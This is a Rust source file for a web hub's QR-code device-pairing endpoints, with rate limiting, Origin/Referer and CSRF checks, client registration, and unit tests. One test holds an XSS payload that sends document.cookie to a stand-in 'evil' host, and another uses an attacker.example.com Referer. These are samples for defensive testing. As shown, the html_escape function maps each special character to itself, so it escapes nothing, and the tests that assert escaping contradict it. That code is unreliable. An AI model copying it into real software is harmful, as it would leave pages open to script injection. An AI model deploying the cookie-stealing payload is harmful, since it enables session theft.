use axum::{
extract::{Path, Query, State},
http::{HeaderMap, StatusCode},
response::{Html, IntoResponse, Json},
};
use serde::{Deserialize, Serialize};
use std::collections::HashMap;
use std::net::SocketAddr;
use std::sync::{Arc, Mutex as StdMutex};
use std::time::{Duration, Instant};
use tracing::{debug, info, warn};
use crate::hub::pairing::PairingError;
use crate::hub::HubState;
use crate::ilink::types::{GetQrcodeResponse, QrcodeStatusResponse};
static PAIR_HTML_TEMPLATE: &str = include_str!("pair.html");
fn html_escape(s: &str) -> String {
let mut out = String::with_capacity(s.len());
for ch in s.chars() {
match ch {
'&' => out.push_str("&"),
'<' => out.push_str("<"),
'>' => out.push_str(">"),
'"' => out.push_str("""),
'\'' => out.push_str("'"),
_ => out.push(ch),
}
}
out
}
#[derive(Debug, Deserialize)]
pub struct BotQrcodeQuery {
#[serde(default)]
pub bot_type: Option<String>,
}
#[derive(Debug, Deserialize)]
pub struct QrcodeStatusQuery {
pub qrcode: String,
#[serde(default)]
pub verify_code: Option<String>,
}
#[derive(Debug, Deserialize, Default)]
pub struct BotQrcodeBody {
#[serde(default)]
pub local_token_list: Vec<String>,
}
const QR_STATUS_LONG_POLL: Duration = Duration::from_secs(25);
const PAIR_CONFIRM_RATE_LIMIT_WINDOW: Duration = Duration::from_secs(60);
const PAIR_CONFIRM_RATE_LIMIT_MAX_ENTRIES: usize = 4096;
#[derive(Debug, Deserialize)]
pub struct PairConfirmRequest {
pub name: String,
pub label: Option<String>,
}
#[derive(Debug, Serialize)]
pub struct PairConfirmResponse {
pub ret: i32,
pub name: String,
pub vtoken: String,
}
fn pairing_device_id() -> String {
use std::sync::OnceLock;
static DEVICE_ID: OnceLock<String> = OnceLock::new();
DEVICE_ID
.get_or_init(|| {
crate::relay::DeviceIdentity::load_or_create()
.map(|id| id.device_id().to_string())
.unwrap_or_else(|e| {
warn!(error = %e, "failed to load device identity, using ephemeral id");
uuid::Uuid::new_v4().to_string()
})
})
.clone()
}
fn pair_public_url() -> String {
crate::relay::resolve_pair_public_url(&pairing_device_id())
}
fn client_base_url() -> String {
std::env::var("HUB_CLIENT_URL")
.ok()
.map(|s| s.trim().trim_end_matches('/').to_string())
.filter(|s| !s.is_empty())
.unwrap_or_else(|| "http://127.0.0.1:8765".to_string())
}
fn origin_matches_device_base(origin: &str) -> bool {
let base = pair_public_url();
if let (Ok(parsed_origin), Ok(parsed_base)) = (url::Url::parse(origin), url::Url::parse(&base))
{
if parsed_origin.scheme() != parsed_base.scheme() {
return false;
}
if parsed_origin.host_str() != parsed_base.host_str() {
return false;
}
let o_port = parsed_origin.port_or_known_default();
let b_port = parsed_base.port_or_known_default();
return o_port == b_port;
}
origin.trim_end_matches('/') == base.trim_end_matches('/')
}
#[derive(Debug, PartialEq, Eq)]
pub enum OriginCheckError {
Missing,
NotAllowed,
}
pub fn check_origin_or_referer(
origin_header: Option<&str>,
referer_header: Option<&str>,
) -> Result<(), OriginCheckError> {
let value = match origin_header.or(referer_header) {
None => return Err(OriginCheckError::Missing),
Some(v) => v,
};
let origin_to_check = if value.contains("://") {
value.to_string()
} else {
match url::Url::parse(value) {
Ok(parsed) => {
let mut s = format!("{}://{}", parsed.scheme(), parsed.host_str().unwrap_or(""));
if let Some(port) = parsed.port() {
s.push(':');
s.push_str(&port.to_string());
}
s
}
Err(_) => value.to_string(),
}
};
if origin_matches_device_base(&origin_to_check) {
Ok(())
} else {
Err(OriginCheckError::NotAllowed)
}
}
#[derive(Default)]
pub struct PairConfirmRateLimiter {
attempts: StdMutex<HashMap<(String, String), Instant>>,
}
impl PairConfirmRateLimiter {
pub fn check_and_record(&self, code: &str, ip: &str) -> bool {
let now = Instant::now();
let key = (code.to_string(), ip.to_string());
let mut attempts = self.attempts.lock().unwrap_or_else(|e| e.into_inner());
attempts.retain(|_, t| now.duration_since(*t) < PAIR_CONFIRM_RATE_LIMIT_WINDOW);
if attempts.contains_key(&key) {
return false;
}
if attempts.len() >= PAIR_CONFIRM_RATE_LIMIT_MAX_ENTRIES {
if let Some(oldest) = attempts
.iter()
.min_by_key(|(_, t)| **t)
.map(|(k, _)| k.clone())
{
attempts.remove(&oldest);
}
}
attempts.insert(key, now);
true
}
#[doc(hidden)]
pub fn tracked_count(&self) -> usize {
let attempts = self.attempts.lock().unwrap_or_else(|e| e.into_inner());
attempts.len()
}
}
static PAIR_CONFIRM_RATE_LIMITER: std::sync::OnceLock<PairConfirmRateLimiter> =
std::sync::OnceLock::new();
fn pair_confirm_rate_limiter() -> &'static PairConfirmRateLimiter {
PAIR_CONFIRM_RATE_LIMITER.get_or_init(PairConfirmRateLimiter::default)
}
const QR_CREATE_RATE_LIMIT_MAX: usize = 20;
const QR_CREATE_RATE_LIMIT_WINDOW: Duration = Duration::from_secs(60);
const QR_CREATE_RATE_LIMIT_MAX_ENTRIES: usize = 4096;
#[derive(Default)]
struct QrCreateRateLimiter {
attempts: StdMutex<HashMap<String, Vec<Instant>>>,
}
impl QrCreateRateLimiter {
fn check_and_record(&self, ip: &str) -> bool {
let now = Instant::now();
let mut map = self.attempts.lock().unwrap_or_else(|e| e.into_inner());
map.retain(|_, times| {
times.retain(|t| now.duration_since(*t) < QR_CREATE_RATE_LIMIT_WINDOW);
!times.is_empty()
});
let current = map.get(ip).map(|v| v.len()).unwrap_or(0);
if current >= QR_CREATE_RATE_LIMIT_MAX {
return false;
}
if map.len() >= QR_CREATE_RATE_LIMIT_MAX_ENTRIES && !map.contains_key(ip) {
if let Some(oldest) = map
.iter()
.min_by_key(|(_, times)| times.first().copied().unwrap_or(now))
.map(|(k, _)| k.clone())
{
map.remove(&oldest);
}
}
map.entry(ip.to_string()).or_default().push(now);
true
}
}
static QR_CREATE_RATE_LIMITER: std::sync::OnceLock<QrCreateRateLimiter> =
std::sync::OnceLock::new();
fn qr_create_rate_limiter() -> &'static QrCreateRateLimiter {
QR_CREATE_RATE_LIMITER.get_or_init(QrCreateRateLimiter::default)
}
pub struct ClientIp(pub String);
impl<S> axum::extract::FromRequestParts<S> for ClientIp
where
S: Send + Sync,
{
type Rejection = std::convert::Infallible;
async fn from_request_parts(
parts: &mut axum::http::request::Parts,
_state: &S,
) -> Result<Self, Self::Rejection> {
let ip = parts
.extensions
.get::<axum::extract::ConnectInfo<SocketAddr>>()
.map(|ci| ci.0.ip().to_string())
.unwrap_or_else(|| "unknown".to_string());
Ok(ClientIp(ip))
}
}
pub async fn register_client_in_hub(
state: &HubState,
name: String,
label: Option<String>,
description: Option<String>,
) -> RegisterClientOutcome {
let (plaintext, hashed, is_new, is_first) = {
let mut registry = state.clients.registry.write().await;
let (plaintext, hashed, is_new) =
registry.register(name.clone(), label.clone(), description.clone());
let is_first = is_new && registry.all_clients().len() == 1;
(plaintext, hashed, is_new, is_first)
};
if is_first {
{
let mut router = state.routing.router.lock().await;
router.set_default(hashed.clone());
}
if let Err(e) = state
.store
.set_route(crate::store::HUB_DEFAULT_SENTINEL, &hashed)
.await
{
warn!(error = %e, "failed to persist default client on first registration");
}
}
if let Err(e) = state
.store
.upsert_client(&hashed, &name, label.as_deref())
.await
{
warn!(error = %e, name = %name, "failed to persist paired client");
}
RegisterClientOutcome {
plaintext,
hashed,
is_new,
}
}
pub async fn register_confirmed_client_in_hub(
state: &HubState,
name: String,
label: Option<String>,
description: Option<String>,
vtoken_plain: String,
) -> Result<RegisterClientOutcome, PairingError> {
use crate::hub::hash_vtoken;
let hashed = hash_vtoken(&vtoken_plain);
let is_first = {
let mut registry = state.clients.registry.write().await;
if registry
.register_confirmed(
name.clone(),
label.clone(),
description.clone(),
hashed.clone(),
)
.is_err()
{
return Err(PairingError::NameCollision);
}
registry.all_clients().len() == 1
};
if is_first {
let mut router = state.routing.router.lock().await;
router.set_default(hashed.clone());
}
if let Err(e) = state
.store
.upsert_client(&hashed, &name, label.as_deref())
.await
{
warn!(error = %e, name = %name, "failed to persist paired client");
}
Ok(RegisterClientOutcome {
plaintext: vtoken_plain,
hashed,
is_new: true,
})
}
#[derive(Debug, Clone)]
pub struct RegisterClientOutcome {
pub plaintext: String,
pub hashed: String,
pub is_new: bool,
}
#[derive(Debug)]
pub enum UnregisterClientError {
NotFound,
StillOnline,
Store(anyhow::Error),
}
pub async fn unregister_client_in_hub(
state: &HubState,
name: &str,
force: bool,
) -> Result<(), UnregisterClientError> {
let vtoken = {
let registry = state.clients.registry.read().await;
let Some(client) = registry.get_by_name(name) else {
return Err(UnregisterClientError::NotFound);
};
if client.online && !force {
return Err(UnregisterClientError::StillOnline);
}
client.vtoken.clone()
};
let new_default = {
let mut registry = state.clients.registry.write().await;
if !registry.remove(name) {
return Err(UnregisterClientError::NotFound);
}
registry.pick_default_after_remove(&vtoken)
};
{
let mut router = state.routing.router.lock().await;
router.remove_routes_for_vtoken(&vtoken, new_default);
}
state.clients.last_seen.remove(&vtoken);
if let Err(e) = state.clients.queue.remove_client(&vtoken).await {
warn!(error = %e, vtoken = %crate::redact_token(&vtoken), "failed to remove client queue");
}
state
.store
.clear_routes_for_vtoken(&vtoken)
.await
.map_err(UnregisterClientError::Store)?;
state
.store
.delete_client_by_name(name)
.await
.map_err(UnregisterClientError::Store)?;
info!(client = %name, vtoken = %crate::redact_token(&vtoken), "admin deleted offline client");
Ok(())
}
#[derive(Debug)]
pub enum UpdateClientError {
NotFound,
NameTaken,
InvalidName,
Store(anyhow::Error),
}
pub async fn update_client_in_hub(
state: &HubState,
old_name: &str,
new_name: &str,
label: Option<String>,
persona_name: Option<String>,
persona_emoji: Option<String>,
) -> Result<String, UpdateClientError> {
let new_name = new_name.trim();
if new_name.is_empty() {
return Err(UpdateClientError::InvalidName);
}
let label_for_store = label.clone();
let vtoken = {
let mut registry = state.clients.registry.write().await;
let vtoken = registry
.update_client(old_name, new_name, label)
.map_err(|e| match e {
crate::hub::registry::UpdateClientError::NotFound => UpdateClientError::NotFound,
crate::hub::registry::UpdateClientError::NameTaken => UpdateClientError::NameTaken,
})?;
registry.set_persona(&vtoken, persona_name.clone(), persona_emoji.clone());
vtoken
};
state
.store
.update_client_by_vtoken(&vtoken, new_name, label_for_store.as_deref())
.await
.map_err(UpdateClientError::Store)?;
state
.store
.update_client_persona(&vtoken, persona_name.as_deref(), persona_emoji.as_deref())
.await
.map_err(UpdateClientError::Store)?;
info!(
old_name = %old_name,
new_name = %new_name,
vtoken = %crate::redact_token(&vtoken),
"admin updated client"
);
Ok(vtoken)
}
fn build_pairing_qr_response(code: String) -> GetQrcodeResponse {
let base = pair_public_url();
let pair_url = crate::relay::pair_qr_url(&base, &code);
debug!(code = %code, pair_url = %pair_url, "pairing QR session created");
GetQrcodeResponse {
ret: 0,
qrcode: Some(code),
qrcode_img_content: Some(pair_url),
errmsg: None,
}
}
async fn create_pairing_qr(state: &HubState) -> GetQrcodeResponse {
let code = {
let mut pairing = state.clients.pairing.write().await;
match pairing.create() {
Ok(code) => code,
Err(PairingError::TooManySessions) => {
return GetQrcodeResponse {
ret: -1,
qrcode: None,
qrcode_img_content: None,
errmsg: Some("too many active pairing sessions; retry shortly".to_string()),
};
}
Err(_) => {
return GetQrcodeResponse {
ret: -1,
qrcode: None,
qrcode_img_content: None,
errmsg: Some("failed to create pairing session".to_string()),
};
}
}
};
build_pairing_qr_response(code)
}
pub async fn get_bot_qrcode(
State(state): State<Arc<HubState>>,
ClientIp(ip): ClientIp,
Query(_query): Query<BotQrcodeQuery>,
) -> (StatusCode, Json<GetQrcodeResponse>) {
if !qr_create_rate_limiter().check_and_record(&ip) {
return (
StatusCode::TOO_MANY_REQUESTS,
Json(GetQrcodeResponse {
ret: -1,
qrcode: None,
qrcode_img_content: None,
errmsg: Some("too many pairing QR requests; retry shortly".to_string()),
}),
);
}
(
StatusCode::OK,
Json(create_pairing_qr(state.as_ref()).await),
)
}
pub async fn get_bot_qrcode_post(
State(state): State<Arc<HubState>>,
ClientIp(ip): ClientIp,
Query(_query): Query<BotQrcodeQuery>,
Json(body): Json<BotQrcodeBody>,
) -> (StatusCode, Json<GetQrcodeResponse>) {
if !qr_create_rate_limiter().check_and_record(&ip) {
return (
StatusCode::TOO_MANY_REQUESTS,
Json(GetQrcodeResponse {
ret: -1,
qrcode: None,
qrcode_img_content: None,
errmsg: Some("too many pairing QR requests; retry shortly".to_string()),
}),
);
}
if !body.local_token_list.is_empty() {
debug!(
count = body.local_token_list.len(),
"get_bot_qrcode POST (local_token_list ignored for hub pairing)"
);
}
(
StatusCode::OK,
Json(create_pairing_qr(state.as_ref()).await),
)
}
async fn qrcode_status_json(state: &HubState, qrcode: &str) -> QrcodeStatusResponse {
let claimed = {
let mut pairing = state.clients.pairing.write().await;
pairing.claim_confirmed_vtoken(qrcode)
};
let Some((session, bot_token)) = claimed else {
return QrcodeStatusResponse {
ret: -1,
status: Some("expired".to_string()),
bot_token: None,
baseurl: None,
ilink_bot_id: None,
ilink_user_id: None,
errmsg: Some("pairing session not found".to_string()),
};
};
let client_base = client_base_url();
let status = session.status_str().to_string();
QrcodeStatusResponse {
ret: 0,
status: Some(status),
bot_token,
baseurl: if session.status_str() == "confirmed" {
Some(client_base)
} else {
None
},
ilink_bot_id: Some("ilink-hub@hub.local".to_string()),
ilink_user_id: Some("hub-client".to_string()),
errmsg: None,
}
}
pub async fn get_qrcode_status(
State(state): State<Arc<HubState>>,
Query(query): Query<QrcodeStatusQuery>,
) -> Json<QrcodeStatusResponse> {
if query.verify_code.is_some() {
debug!("verify_code ignored for hub client pairing");
}
let deadline = Instant::now() + QR_STATUS_LONG_POLL;
let mut notified = std::pin::pin!(state.clients.pairing_notify.notified());
loop {
let resp = qrcode_status_json(state.as_ref(), &query.qrcode).await;
let terminal = resp.status.as_deref() != Some("wait");
if terminal || Instant::now() >= deadline {
return Json(resp);
}
let remaining = deadline.saturating_duration_since(Instant::now());
tokio::select! {
_ = &mut notified => {
notified.set(state.clients.pairing_notify.notified());
}
_ = tokio::time::sleep(remaining) => {}
}
}
}
pub async fn pair_page(
State(state): State<Arc<HubState>>,
Path(code): Path<String>,
) -> impl IntoResponse {
let session = {
let mut pairing = state.clients.pairing.write().await;
let changed = pairing.get(&code).is_some() && {
pairing.mark_scanned(&code);
true
};
if changed {
state.clients.pairing_notify.notify_waiters();
}
pairing.get(&code)
};
let Some(session) = session else {
return (
StatusCode::NOT_FOUND,
Html("<h1>配对码无效或已过期</h1><p>请回到客户端重新获取二维码。</p>".to_string()),
)
.into_response();
};
if session.status_str() == "expired" {
return (
StatusCode::GONE,
Html("<h1>配对码已过期</h1><p>请回到客户端重新获取二维码。</p>".to_string()),
)
.into_response();
}
if session.status_str() == "confirmed" {
let name = session.client_name.as_deref().unwrap_or("client");
let name = html_escape(name);
return (
StatusCode::OK,
Html(format!(
"<h1>已配对</h1><p>客户端 <strong>{name}</strong> 已成功接入。</p>"
)),
)
.into_response();
}
let csrf = match session.csrf.as_deref() {
Some(t) => t.to_string(),
None => {
warn!(code = %code, "pair session has no csrf token; refusing to render");
return (
StatusCode::INTERNAL_SERVER_ERROR,
Html("<h1>内部错误</h1><p>无法生成配对凭证,请重试。</p>".to_string()),
)
.into_response();
}
};
let html = PAIR_HTML_TEMPLATE
.replace("__PAIR_CODE__", &code)
.replace("__PAIR_CSRF__", &csrf);
(StatusCode::OK, Html(html)).into_response()
}
pub async fn rollback_speculative_register(state: &HubState, name: &str, vtoken: &str) {
let new_default = {
let mut registry = state.clients.registry.write().await;
match registry.get_by_name(name) {
Some(info) if info.vtoken == vtoken => {}
_ => {
debug!(
name = %name,
"rollback_speculative_register: name no longer maps to the \
speculative vtoken; refusing to roll back (F-M1-A defence)"
);
return;
}
}
if !registry.remove(name) {
return;
}
registry.pick_default_after_remove(vtoken)
};
{
let mut router = state.routing.router.lock().await;
router.remove_routes_for_vtoken(vtoken, new_default);
}
state.clients.last_seen.remove(vtoken);
if let Err(e) = state.clients.queue.remove_client(vtoken).await {
warn!(
error = %e,
vtoken = %&vtoken[..vtoken.len().min(8)],
"failed to remove speculative-winner queue during rollback"
);
}
if let Err(e) = state.store.clear_routes_for_vtoken(vtoken).await {
warn!(
error = %e,
vtoken = %&vtoken[..vtoken.len().min(8)],
"failed to clear speculative-winner routes during rollback"
);
}
if let Err(e) = state.store.delete_client_by_name(name).await {
warn!(error = %e, name = %name, "failed to delete speculative-winner client during rollback");
}
}
pub async fn pair_confirm(
State(state): State<Arc<HubState>>,
Path(code): Path<String>,
headers: HeaderMap,
peer_ip: axum::extract::ConnectInfo<std::net::SocketAddr>,
Json(req): Json<PairConfirmRequest>,
) -> (StatusCode, Json<serde_json::Value>) {
const MAX_NAME_LEN: usize = 64;
let name = req.name.trim().to_string();
if name.is_empty() {
return (
StatusCode::BAD_REQUEST,
Json(serde_json::json!({ "error": "name is required" })),
);
}
if name.len() > MAX_NAME_LEN {
return (
StatusCode::BAD_REQUEST,
Json(
serde_json::json!({ "error": format!("name must be at most {MAX_NAME_LEN} characters") }),
),
);
}
let label = req
.label
.map(|l| l.trim().to_string())
.filter(|l| !l.is_empty());
if let Some(ref l) = label {
if l.len() > MAX_NAME_LEN {
return (
StatusCode::BAD_REQUEST,
Json(
serde_json::json!({ "error": format!("label must be at most {MAX_NAME_LEN} characters") }),
),
);
}
}
let relay_secret_ok = headers
.get("x-ilink-relay-secret")
.and_then(|v| v.to_str().ok())
.map(|v| {
use subtle::ConstantTimeEq;
v.as_bytes()
.ct_eq(state.relay_secret.as_bytes())
.unwrap_u8()
== 1
})
.unwrap_or(false);
let effective_ip = if peer_ip.0.ip().is_loopback() && relay_secret_ok {
headers
.get("x-forwarded-for")
.and_then(|v| v.to_str().ok())
.and_then(|s| s.split(',').next())
.map(str::trim)
.filter(|s| !s.is_empty())
.map(str::to_string)
.unwrap_or_else(|| peer_ip.0.ip().to_string())
} else {
peer_ip.0.ip().to_string()
};
if !pair_confirm_rate_limiter().check_and_record(&code, &effective_ip) {
return (
StatusCode::TOO_MANY_REQUESTS,
Json(serde_json::json!({ "error": "too many confirm attempts for this pairing code" })),
);
}
let origin_hdr = headers
.get("origin")
.and_then(|v| v.to_str().ok())
.map(str::to_string);
let referer_hdr = headers
.get("referer")
.and_then(|v| v.to_str().ok())
.map(str::to_string);
if let Err(err) = check_origin_or_referer(origin_hdr.as_deref(), referer_hdr.as_deref()) {
return match err {
OriginCheckError::Missing => (
StatusCode::FORBIDDEN,
Json(serde_json::json!({ "error": "origin header required" })),
),
OriginCheckError::NotAllowed => (
StatusCode::FORBIDDEN,
Json(serde_json::json!({ "error": "origin not allowed" })),
),
};
}
let csrf_header = match headers.get("x-pair-csrf").and_then(|v| v.to_str().ok()) {
Some(v) if !v.is_empty() => v.to_string(),
_ => {
return (
StatusCode::FORBIDDEN,
Json(serde_json::json!({ "error": "missing or invalid CSRF token" })),
);
}
};
{
let mut pairing = state.clients.pairing.write().await;
if let Err(e) = pairing.pre_check_confirm(&code, &csrf_header) {
return match e {
PairingError::NotFound => (
StatusCode::NOT_FOUND,
Json(serde_json::json!({ "error": "pairing session not found" })),
),
PairingError::Expired => (
StatusCode::GONE,
Json(serde_json::json!({ "error": "pairing session expired" })),
),
PairingError::AlreadyConfirmed => (
StatusCode::CONFLICT,
Json(serde_json::json!({ "error": "pairing already confirmed" })),
),
PairingError::NotScanned => (
StatusCode::PRECONDITION_FAILED,
Json(serde_json::json!({ "error": "pairing code not yet scanned" })),
),
PairingError::CsrfMismatch => (
StatusCode::FORBIDDEN,
Json(serde_json::json!({ "error": "csrf token mismatch" })),
),
PairingError::TooManySessions => (
StatusCode::SERVICE_UNAVAILABLE,
Json(serde_json::json!({ "error": "too many active pairing sessions" })),
),
PairingError::NameCollision => (
StatusCode::CONFLICT,
Json(serde_json::json!({ "error": "client name already registered" })),
),
};
}
}
let vtoken_plain = format!("vhub_{}", uuid::Uuid::new_v4().simple());
let confirm_result = {
let mut pairing = state.clients.pairing.write().await;
pairing.confirm(
&code,
name.clone(),
label.clone(),
vtoken_plain.clone(),
&csrf_header,
)
};
match confirm_result {
Ok(()) => {
match register_confirmed_client_in_hub(
state.as_ref(),
name.clone(),
label,
None, vtoken_plain.clone(),
)
.await
{
Ok(_) => {
state.clients.pairing_notify.notify_waiters();
debug!(code = %code, name = %name, "pairing confirmed");
(
StatusCode::OK,
Json(serde_json::json!({
"ret": 0,
"name": name,
"vtoken": vtoken_plain,
})),
)
}
Err(e) => {
{
let mut pairing = state.clients.pairing.write().await;
pairing.remove_confirmed(&code);
}
match e {
PairingError::NameCollision => (
StatusCode::CONFLICT,
Json(serde_json::json!({ "error": "client name already registered" })),
),
_ => (
StatusCode::INTERNAL_SERVER_ERROR,
Json(serde_json::json!({ "error": "failed to register client" })),
),
}
}
}
}
Err(e) => match e {
PairingError::NotFound => (
StatusCode::NOT_FOUND,
Json(serde_json::json!({ "error": "pairing session not found" })),
),
PairingError::Expired => (
StatusCode::GONE,
Json(serde_json::json!({ "error": "pairing session expired" })),
),
PairingError::AlreadyConfirmed => (
StatusCode::CONFLICT,
Json(serde_json::json!({ "error": "pairing already confirmed" })),
),
PairingError::NotScanned => (
StatusCode::PRECONDITION_FAILED,
Json(serde_json::json!({ "error": "pairing code not yet scanned" })),
),
PairingError::CsrfMismatch => (
StatusCode::FORBIDDEN,
Json(serde_json::json!({ "error": "csrf token mismatch" })),
),
PairingError::TooManySessions => (
StatusCode::SERVICE_UNAVAILABLE,
Json(serde_json::json!({ "error": "too many active pairing sessions" })),
),
PairingError::NameCollision => (
StatusCode::CONFLICT,
Json(serde_json::json!({ "error": "client name already registered" })),
),
},
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn check_origin_or_referer_rejects_missing_headers() {
assert_eq!(
check_origin_or_referer(None, None),
Err(OriginCheckError::Missing),
"F-M1-B: missing both Origin and Referer must be rejected (the \
pre-fix if/else-if chain had no terminating else)"
);
}
#[test]
fn check_origin_or_referer_rejects_garbage() {
assert_eq!(
check_origin_or_referer(Some("not a url"), None),
Err(OriginCheckError::NotAllowed),
"garbage Origin must be rejected as NotAllowed"
);
assert_eq!(
check_origin_or_referer(None, Some("not a url")),
Err(OriginCheckError::NotAllowed),
"garbage Referer must be rejected as NotAllowed"
);
}
#[test]
fn check_origin_or_referer_accepts_well_formed_referer() {
let bad = "https://attacker.example.com/some/path";
assert_eq!(
check_origin_or_referer(None, Some(bad)),
Err(OriginCheckError::NotAllowed),
"a well-formed but foreign Referer must be rejected"
);
}
#[test]
fn html_escape_replaces_all_five_special_chars() {
let input = "<script>alert(\"xss&'\")</script>";
let escaped = html_escape(input);
assert_eq!(
escaped, "<script>alert("xss&'")</script>",
"all five HTML-special chars must be replaced with named entities"
);
assert!(
!escaped.contains('<') && !escaped.contains('>'),
"no raw angle brackets must survive"
);
}
#[test]
fn html_escape_is_a_noop_on_safe_input() {
for s in ["client", "My Phone 2", "客户端-A", "user_name-1"] {
assert_eq!(html_escape(s), s, "non-special input must not be altered");
}
}
#[test]
fn html_escape_preserves_unicode_codepoints() {
let s = "客户端 🔥 <script>";
let escaped = html_escape(s);
assert!(escaped.starts_with("客户端 🔥 "));
assert!(escaped.ends_with("<script>"));
}
#[test]
fn confirmed_pair_page_renders_with_escaped_client_name() {
let payload = r#"<img src=x onerror="fetch('//evil/'+document.cookie)">"#;
let escaped = html_escape(payload);
assert!(
!escaped.contains('<'),
"escaped client_name must contain no raw '<' (no tag start): {escaped:?}"
);
assert!(
!escaped.contains('>'),
"escaped client_name must contain no raw '>' (no tag end): {escaped:?}"
);
assert!(
escaped.contains("<img"),
"rendered form must show the escaped tag, not the raw tag: {escaped}"
);
let body = format!("<h1>已配对</h1><p>客户端 <strong>{escaped}</strong> 已成功接入。</p>");
let lt_count = body.matches('<').count();
assert_eq!(
lt_count, 6,
"rendered body must contain exactly the 6 '<' from the static template: {body}"
);
assert!(
!body.contains("<img") && !body.contains("<script") && !body.contains("<iframe"),
"rendered body must not contain a raw injection tag: {body}"
);
}
#[test]
fn confirmed_pair_page_uses_fallback_when_client_name_missing() {
let name = "client";
let body = format!(
"<h1>已配对</h1><p>客户端 <strong>{}</strong> 已成功接入。</p>",
html_escape(name)
);
assert_eq!(
body,
"<h1>已配对</h1><p>客户端 <strong>client</strong> 已成功接入。</p>"
);
}
#[test]
fn confirmed_pair_page_handles_long_adversarial_name() {
let payload: String = "A".repeat(4096) + "<script>" + &"B".repeat(4096);
let escaped = html_escape(&payload);
assert_eq!(escaped.len(), 4096 + "<script>".len() + 4096);
assert!(!escaped.contains("<script>"));
assert!(escaped.contains("<script>"));
}
}